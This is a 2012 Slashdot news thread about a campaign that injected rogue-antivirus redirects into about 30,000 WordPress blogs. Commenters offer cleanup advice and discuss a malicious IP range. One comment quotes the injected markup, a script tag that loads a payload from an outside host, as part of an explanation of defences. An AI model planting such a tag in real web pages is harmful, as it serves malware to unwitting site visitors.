Forgot your password?
typodupeerror
Security News

30K WordPress Blogs Infected With the Latest Malware Scam 104

Posted by Unknown Lamer
from the check-your-versions dept.
alphadogg writes with an excerpt from an article over at Network World: "Almost 30,000 WordPress blogs have been infected in a new wave of attacks orchestrated by a cybercriminal gang whose primary goal is to distribute rogue antivirus software, researchers from security firm Websense say. The attacks have resulted in over 200,000 infected pages that redirect users to websites displaying fake antivirus scans. The latest compromises are part of a rogue antivirus distribution campaign that has been going on for months, the Websense researchers said."
This discussion has been archived. No new comments can be posted.

30K WordPress Blogs Infected With the Latest Malware Scam

Comments Filter:
  • McAfee? (Score:5, Funny)

    by Oswald McWeany (2428506) on Wednesday March 07, 2012 @12:00PM (#39275373)

    websites displaying fake antivirus scans

    I didn't know McAfee had started targeting Web blogs now.

    • Re:McAfee? (Score:4, Informative)

      by tepples (727027) <tepples AT gmail DOT com> on Wednesday March 07, 2012 @12:02PM (#39275389) Homepage Journal
      It might be hard to believe, but there are antivirus companies even less scrupulous than McAfee and Norton. Wikipedia explains [wikipedia.org].
      • by Ihmhi (1206036)

        Selectively disabling parts of the system to prevent the user from uninstalling the malware. Some may also prevent anti-malware programs from running, disable automatic system software updates and block access to websites of anti-malware vendors.

        I dunno, sounds like Norton to me.

        • At least Norton tries to provide a working removal tool [symantec.com] at no charge. The only problem I've found is that it's made deliberately inaccessible to blind users (with a CAPTCHA) so that malware doesn't automatically run it on every computer that it tries to infect.
        • by hairyfeet (841228)

          Oh Lord, please don't say that name! Poor Jim is still rocking himself in the corner going "It just won't uninstall! Why won't it uninstall? It just won't go away" after the last wave of Norton infected laptops came through and we have finally got his mumbling quieted down, please don't give Jim a flashback!

          As for TFA this is why I recommend the combo of Win 7 with either Avast or Comodo IS along with Comodo Dragon with ABP. Windows 7 has DEP and ASLR along with UAC and Comodo Dragon is able to take advanta

  • Analysis (Score:4, Insightful)

    by SirDice (1548907) on Wednesday March 07, 2012 @12:07PM (#39275443)
    Why do they always focus on the crap that's left behind when they analyses these things? I want to know how they managed to get that stuff on those servers so I can check my own. Was is an old and vulnerable WordPress or was it some 0-day they used? For some reason they always focus on the effects and not on the causes.
  • Is it just a popularity/contrast thing, or does wordpress seem to be popping up a lot recently for security holes in their web servers?

    • by Spad (470073)

      At a guess, the ratio of Installs to Unpatched/Insecure Installs, both of the core WP software and its many, many 3rd party plugins and themes.

      A *lot* of sites are either running old versions of software or have plugins/themes with gaping vulnerabilities that are no longer under active development.

      • Re:wordpress, again? (Score:5, Interesting)

        by gmack (197796) <gmack@in n e rfire.net> on Wednesday March 07, 2012 @12:24PM (#39275647) Homepage Journal

        Some of that is Wordpress' fault for not having an easy way to run mass upgrades. My employer has 15 different sites running on Wordpress and the fact that I have to log in to each one manually after upgrading the files and click a link to handle the database update is annoying.

        • by Anonymous Coward

          Set up WP MultiSite, update one site and one set of plugins and be done with it - easy as that...

        • Re:wordpress, again? (Score:4, Informative)

          by nick.sideras (836787) on Wednesday March 07, 2012 @12:41PM (#39275879)

          Some of that is Wordpress' fault for not having an easy way to run mass upgrades. My employer has 15 different sites running on Wordpress and the fact that I have to log in to each one manually after upgrading the files and click a link to handle the database update is annoying.

          This drove me nuts at my current job for about 2 months - you need Wordpress Network [wordpress.org].

          There's the easy way and the hard(er) way to do this:

          This [wordpress.org] is the official easy way, but it's never worked for me (last tried in Spring of 2011). The nice thing is that it's all stuff built into WordPress, so you should be able to do it without any problems. I'd say it's probably worth giving this a try with one site, and if it works, run with it.

          This [bavatuesdays.com] is more down and dirty way that will definitely work, and is more or less how I did it. A little SQL editing never hurt anyone.
          Also, this [sillybean.net] is a great companion to the bavatuesdays link. He goes on about his DNS in the first few paragraphs, but the second half of that post has some good details about where files need to be, and how links and such need to be updated.

          Once you have a network, you a fantastic "Update Network [wordpress.org]" button. Boom. Take the rest of the day off.

        • Agreed! At least you only have 15, I've just been given the task of managing our Wordpress implementation, we're at 144. *Ugh*
        • by Anonymus (2267354)

          WordPress is extremely easy and quick to update. You can click a single button and update every single plugin and theme, or another button to update core. That's it. If you're upgrading by manually uploading files to a bunch of different servers for some reason, you should at least look into something like updating with Subversion [wordpress.org] or using multisite and just updating once for every site.

        • by Hatta (162192)

          You can't automatically log into a website and click a link with a very small shell script?

        • Seriously? It's a hassle to have to log into each server and click a link?

          You must never have run Gentoo*...

          *Which is still my favorite distro, despite occasionally being a real PITA to update.
          • by gmack (197796)

            I used to love hand compiling everything but then I got my first full time sysadmin job. The job came with 20 servers and thankfully 15 of them ran Debian. When you have to do something repeatedly it gets old quickly so now I want the OS to do as much as possible and script most of the rest.

            • LOL. I've been a full time sys admin for ten years -- first with Solaris and FreeBSD servers, then in my current job with about 15 or so Gentoo (!) servers plus my laptop and a desktop. We migrated to Ubuntu about three years ago. In all honesty, we do a much better job of updating the Ubuntu servers than we did the Gentoo servers because it is so much easier to do, but I am starting to loathe my Ubuntu laptop. It's a lot easier to get wireless working in Ubuntu than Gentoo, but Unity, nVidia drivers*,
              • by gmack (197796)

                I gave up on the new Ubuntu pretty quickly while installing a friend's notebook last month and ended up installing debian + xfce + wicd. No complaints from him at all.

                For servers, it's hard to beat debian + dotdeb repo.

        • by mattrad (78969)

          Well my clicking-averse friend, you need managewp.com. One login and a click or two, and you've updated all those 15 installs. Either that or migrate everything to multisite (Backup Buddy is great for that).

        • You mean "the fact that I have missed to write some working update/deployment script is annoying"? Come on - it's not that hard. Just rsync anything but wp-content. Make sure they all have the same plugins installed but not necessarily activated and sync the plugins folder, too. That's for starters. The elegant way involves delivering images and "uploads" from a CDN and simply unpacking the new versions over the old ones by rsync, ftp or wget...
    • by Anonymus (2267354)

      I personally think it's mostly a popularity thing, since WordPress pretty much owns the blog market. I think the other problem, however, is just with how simple they've made it to accidentally backdoor your site. There are thousands of plugins for WordPress, installable with just a couple of clicks, written by people who know nothing about security, or have possibly even maliciously left holes in their plugin. Unlike large projects that are generally maintained and reviewed by dozens of people, a plugin

  • by dgharmon (2564621) on Wednesday March 07, 2012 @12:13PM (#39275529) Homepage
    "The Websense ThreatSeeker Network has detected a new wave of mass-injections [websense.com] of a well-known rogue antivirus campaign"

    How exactly are these sites infected in the first place?

    "The page looks like a Windows Explorer [websense.com] window with a "Windows Security Alert" dialogue box in it"

    Ahh so - nothing to read here ... moving on ...
    • by Pope (17780)

      I used to get those all the time on my Mac and just laugh. Then they made a special OS X-looking one.

    • by Rick17JJ (744063)

      A number of years ago, I encountered a fake Microsoft security warning while using my Linux computer. It said that Microsoft had detected viruses and spyware on my computer. This was on a Linux computer that did not have any Microsoft products installed on it.

      It offered to do a free online scan of my hard drive. Despite clicking on No, a progress bar appeared as it started to do a fake scan of my hard drive. After about 60 seconds, it said that it had finished scanning my drive C. It then said that several

    • by klui (457783)
      So looks like the injected code
      </DIV> <!-- END body-wrapper -->
      <script src="http://ionis90landsi.rr.ru/mm.php?=1"></script>
      </BODY>
      </HTML>

      would be take care of with NoScript as long as your white list is short and doesn't contain rr.nu in this example.
  • by Dynamoo (527749) on Wednesday March 07, 2012 @12:14PM (#39275539) Homepage
    It looks like the first step in the infection is via an IP (194.28.114.103) belonging to Specialist ISP of Transnistria [wikipedia.org]. That has featured before on Slashdot in this story [slashdot.org].

    The block 194.28.112.0/22 is simply all evil (I've documented it here [dynamoo.com] in the past), there's no reason to send traffic to it at all, blocking it is a good option.

    • by gaspyy (514539)

      Transnistria is basically a haven for organized crime. A "republic" with virtually no international recognition, a very small economy and ties with international arm dealers.

      • by Dynamoo (527749)
        Exactly. It's a country that doesn't exist in the eyes of most other countries, which makes it beyond the reach of international law enforcement. There are other countries in the world like that, the difference with Transnistria is that it has a somewhat modern infrastructure.
  • by Opportunist (166417) on Wednesday March 07, 2012 @12:17PM (#39275557)

    Why bother using 0day exploits and payload droppers when the best infector is sitting right in front of the PC?

  • Anyone else continuing to have a problem when you type your password that it shows instead of ******? My password is ilikegirrlz See, it did it again!
    • by Anonymous Coward

      Hunter2
       
      Now get off my lawn!

  • by dgrotto (2588895) on Wednesday March 07, 2012 @01:45PM (#39276675)

    Most of my WP installs were infected because I am a slack ass. Here are the high level steps I took to solve the problem:

    • 1) Backup sites.
    • 2) Fix all world-writable directories in your WP install (what the hell WP?!). This seems to be the primary vector for getting in.
    • 3) Clean up infected PHP files with this script from php-beginners.com [php-beginners.com]. Thank you Paolo.
    • 4) Inspect all .htaccess configs for errant redirects and fix.
    • 5) Install and run the timthumb vulnerability scanner [wordpress.org]. Possible secondary vector. Thank you Peter Butler!
    • 6) Update your WP install to latest and greatest.
    • 7) Remove any unused plugins and themes.
    • 8) Backup sites.

    I may be missing something - again, I'm a slackass. Anyone else have other advice for our admin-challenged friends besides "get a real software package"?

    By the way, I was trying to lock down one of my WP installs to only allow authed users access to posts. However, WP does not put the assets for post - usually in wp-content/uploads - behind the auth wall. It's just out there for the whole world to see. It was a simple fix to rewrite the .htaccess config for this directory to redirect to an auth script, but still it still shocks me how insecure this app is.

    • by dgrotto (2588895)

      Forgot one thing:

      The hack puts a list of sites to redirect to in a .logs directory. rm these.

  • by ThatsNotPudding (1045640) on Wednesday March 07, 2012 @02:27PM (#39277193)
    BTW: why is Adobe allowed to - by default - check the box on their flash updates to also install Norton on the victims computer? How many trusting civilians (think: grandmothers) end up with borked computers with conflicting AV programs solely due to corporate greed? I'm willing to bet this check box (if it even appears) is NOT checked by default in the EU market. Man, I miss government FOR the people...
  • And I was looking for a blog hoster this week, and specifically at WordPress. Anyone got a list of free blog hosters (moving away from blogspot)?

  • Any idea which versions of Wordpress is being targeted and/or which vulnerability? The quoted articles look more like commercials for Websense.

Science is to computer science as hydrodynamics is to plumbing.

Working...